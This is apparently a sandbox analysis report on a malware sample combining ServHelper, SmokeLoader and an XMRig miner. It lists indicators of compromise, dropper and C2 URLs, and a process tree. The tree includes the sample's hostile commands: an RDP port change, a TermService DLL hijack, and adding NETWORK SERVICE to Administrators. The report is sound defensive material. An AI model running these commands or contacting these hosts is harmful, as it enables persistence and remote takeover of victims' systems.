servhelper | 14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992

Analysis

max time kernel
151s
max time network
151s
submitted
01-01-1970 00:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992.exe
Size

340KB
MD5

9c32bd3ba8c37a5667aae34bbc4a84a9
SHA1

59df4764d50b6859ffcb1bbf660f27d2b6bf8d1c
SHA256

14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992
SHA512

cd72c85cd317db7867bd39c2d9b438751f3d1fbfd472fc3d55191f5f3f1b7727a19dc81e626b54a64acd684adc880012f03d6b9b1573f9bd00c415c6cb04cd85

Score

10^/10

servhelper smokeloader xmrig backdoor miner persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	Process
58	3776	powershell.exe
61	3776	powershell.exe
62	3776	powershell.exe
63	3776	powershell.exe
65	3776	powershell.exe
67	3776	powershell.exe
70	3776	powershell.exe
72	3776	powershell.exe
74	3776	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

Processes:

723E.exe88C5.exe

pid	Process
3516	723E.exe
1432	88C5.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x0003000000015295-453.dat	upx
behavioral1/files/0x0003000000015296-454.dat	upx

Deletes itself 1 IoCs

Processes:

pid	Process
3040

Loads dropped DLL 2 IoCs

Processes:

pid	Process
2148
2148

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\SysWOW64\rdpclip.exe	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe

Drops file in Windows directory 24 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIDA90.tmp	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_esjafttj.2jt.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIDA5E.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIDA7F.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vu3ed2tt.hjk.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIDA7E.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIDAA1.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
1708	1432	WerFault.exe	74

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exe

pid	Process
2832	reg.exe
2688	reg.exe

Runs net.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	61	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	62	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	63	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	65	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992.exe

pid	Process
2268	14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992.exe
2268	14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992.exe
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040
3040

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid	Process
3040

Suspicious behavior: LoadsDriver 3 IoCs

Processes:

pid	Process
632
632
632

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992.exe

pid	Process
2268	14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	3348	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeIncreaseQuotaPrivilege	3348	powershell.exe
Token: SeSecurityPrivilege	3348	powershell.exe
Token: SeTakeOwnershipPrivilege	3348	powershell.exe
Token: SeLoadDriverPrivilege	3348	powershell.exe
Token: SeSystemProfilePrivilege	3348	powershell.exe
Token: SeSystemtimePrivilege	3348	powershell.exe
Token: SeProfSingleProcessPrivilege	3348	powershell.exe
Token: SeIncBasePriorityPrivilege	3348	powershell.exe
Token: SeCreatePagefilePrivilege	3348	powershell.exe
Token: SeBackupPrivilege	3348	powershell.exe
Token: SeRestorePrivilege	3348	powershell.exe
Token: SeShutdownPrivilege	3348	powershell.exe
Token: SeDebugPrivilege	3348	powershell.exe
Token: SeSystemEnvironmentPrivilege	3348	powershell.exe
Token: SeRemoteShutdownPrivilege	3348	powershell.exe
Token: SeUndockPrivilege	3348	powershell.exe
Token: SeManageVolumePrivilege	3348	powershell.exe
Token: 33	3348	powershell.exe
Token: 34	3348	powershell.exe
Token: 35	3348	powershell.exe
Token: 36	3348	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeIncreaseQuotaPrivilege	2380	powershell.exe
Token: SeSecurityPrivilege	2380	powershell.exe
Token: SeTakeOwnershipPrivilege	2380	powershell.exe
Token: SeLoadDriverPrivilege	2380	powershell.exe
Token: SeSystemProfilePrivilege	2380	powershell.exe
Token: SeSystemtimePrivilege	2380	powershell.exe
Token: SeProfSingleProcessPrivilege	2380	powershell.exe
Token: SeIncBasePriorityPrivilege	2380	powershell.exe
Token: SeCreatePagefilePrivilege	2380	powershell.exe
Token: SeBackupPrivilege	2380	powershell.exe
Token: SeRestorePrivilege	2380	powershell.exe
Token: SeShutdownPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeSystemEnvironmentPrivilege	2380	powershell.exe
Token: SeRemoteShutdownPrivilege	2380	powershell.exe
Token: SeUndockPrivilege	2380	powershell.exe
Token: SeManageVolumePrivilege	2380	powershell.exe
Token: 33	2380	powershell.exe
Token: 34	2380	powershell.exe
Token: 35	2380	powershell.exe
Token: 36	2380	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeIncreaseQuotaPrivilege	2036	powershell.exe
Token: SeSecurityPrivilege	2036	powershell.exe
Token: SeTakeOwnershipPrivilege	2036	powershell.exe
Token: SeLoadDriverPrivilege	2036	powershell.exe
Token: SeSystemProfilePrivilege	2036	powershell.exe
Token: SeSystemtimePrivilege	2036	powershell.exe
Token: SeProfSingleProcessPrivilege	2036	powershell.exe
Token: SeIncBasePriorityPrivilege	2036	powershell.exe
Token: SeCreatePagefilePrivilege	2036	powershell.exe
Token: SeBackupPrivilege	2036	powershell.exe
Token: SeRestorePrivilege	2036	powershell.exe
Token: SeShutdownPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeSystemEnvironmentPrivilege	2036	powershell.exe
Token: SeRemoteShutdownPrivilege	2036	powershell.exe
Token: SeUndockPrivilege	2036	powershell.exe
Token: SeManageVolumePrivilege	2036	powershell.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

pid	Process
3040
3040
3040
3040
3040

Suspicious use of SendNotifyMessage 9 IoCs

Processes:

pid	Process
3040
3040
3040
3040
3040
3040
3040
3040
3040

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

723E.exepowershell.execsc.exe88C5.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	Process	procid_target
PID 3040 wrote to memory of 3516	3040		70
PID 3040 wrote to memory of 3516	3040		70
PID 3516 wrote to memory of 2568	3516	723E.exe	72
PID 3516 wrote to memory of 2568	3516	723E.exe	72
PID 3040 wrote to memory of 1432	3040		74
PID 3040 wrote to memory of 1432	3040		74
PID 3040 wrote to memory of 1432	3040		74
PID 2568 wrote to memory of 1752	2568	powershell.exe	75
PID 2568 wrote to memory of 1752	2568	powershell.exe	75
PID 1752 wrote to memory of 3992	1752	csc.exe	76
PID 1752 wrote to memory of 3992	1752	csc.exe	76
PID 2568 wrote to memory of 3348	2568	powershell.exe	77
PID 2568 wrote to memory of 3348	2568	powershell.exe	77
PID 1432 wrote to memory of 2352	1432	88C5.exe	79
PID 1432 wrote to memory of 2352	1432	88C5.exe	79
PID 1432 wrote to memory of 2352	1432	88C5.exe	79
PID 2568 wrote to memory of 2380	2568	powershell.exe	82
PID 2568 wrote to memory of 2380	2568	powershell.exe	82
PID 2568 wrote to memory of 2036	2568	powershell.exe	84
PID 2568 wrote to memory of 2036	2568	powershell.exe	84
PID 2352 wrote to memory of 1908	2352	powershell.exe	86
PID 2352 wrote to memory of 1908	2352	powershell.exe	86
PID 2352 wrote to memory of 1908	2352	powershell.exe	86
PID 1908 wrote to memory of 1444	1908	csc.exe	87
PID 1908 wrote to memory of 1444	1908	csc.exe	87
PID 1908 wrote to memory of 1444	1908	csc.exe	87
PID 2352 wrote to memory of 1148	2352	powershell.exe	88
PID 2352 wrote to memory of 1148	2352	powershell.exe	88
PID 2352 wrote to memory of 1148	2352	powershell.exe	88
PID 2568 wrote to memory of 1940	2568	powershell.exe	90
PID 2568 wrote to memory of 1940	2568	powershell.exe	90
PID 2568 wrote to memory of 2832	2568	powershell.exe	91
PID 2568 wrote to memory of 2832	2568	powershell.exe	91
PID 2568 wrote to memory of 568	2568	powershell.exe	92
PID 2568 wrote to memory of 568	2568	powershell.exe	92
PID 2568 wrote to memory of 3056	2568	powershell.exe	93
PID 2568 wrote to memory of 3056	2568	powershell.exe	93
PID 3056 wrote to memory of 3632	3056	net.exe	94
PID 3056 wrote to memory of 3632	3056	net.exe	94
PID 2568 wrote to memory of 4048	2568	powershell.exe	95
PID 2568 wrote to memory of 4048	2568	powershell.exe	95
PID 4048 wrote to memory of 3476	4048	cmd.exe	96
PID 4048 wrote to memory of 3476	4048	cmd.exe	96
PID 3476 wrote to memory of 2204	3476	cmd.exe	97
PID 3476 wrote to memory of 2204	3476	cmd.exe	97
PID 2204 wrote to memory of 1808	2204	net.exe	98
PID 2204 wrote to memory of 1808	2204	net.exe	98
PID 2568 wrote to memory of 2332	2568	powershell.exe	99
PID 2568 wrote to memory of 2332	2568	powershell.exe	99
PID 2332 wrote to memory of 2092	2332	cmd.exe	100
PID 2332 wrote to memory of 2092	2332	cmd.exe	100
PID 2092 wrote to memory of 2080	2092	cmd.exe	101
PID 2092 wrote to memory of 2080	2092	cmd.exe	101
PID 2080 wrote to memory of 3732	2080	net.exe	102
PID 2080 wrote to memory of 3732	2080	net.exe	102
PID 3628 wrote to memory of 2972	3628	cmd.exe	106
PID 3628 wrote to memory of 2972	3628	cmd.exe	106
PID 2972 wrote to memory of 2832	2972	net.exe	107
PID 2972 wrote to memory of 2832	2972	net.exe	107
PID 3324 wrote to memory of 1508	3324	cmd.exe	110
PID 3324 wrote to memory of 1508	3324	cmd.exe	110
PID 1508 wrote to memory of 4052	1508	net.exe	111
PID 1508 wrote to memory of 4052	1508	net.exe	111
PID 3668 wrote to memory of 3348	3668	cmd.exe	114

C:\Users\Admin\AppData\Local\Temp\14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992.exe
"C:\Users\Admin\AppData\Local\Temp\14279e34ce19812a529d3f1cea16e54d57a40322ba34b63a85784d4fc5672992.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2268

C:\Users\Admin\AppData\Local\Temp\723E.exe
C:\Users\Admin\AppData\Local\Temp\723E.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2568
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5bspetlg\5bspetlg.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1752
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8DE4.tmp" "c:\Users\Admin\AppData\Local\Temp\5bspetlg\CSCAD9EEE5ECB774DD390834F78CE22798.TMP"
      4⤵
      PID:3992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2036
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1940
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:2832
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:568
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3056
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3632
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4048
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3476
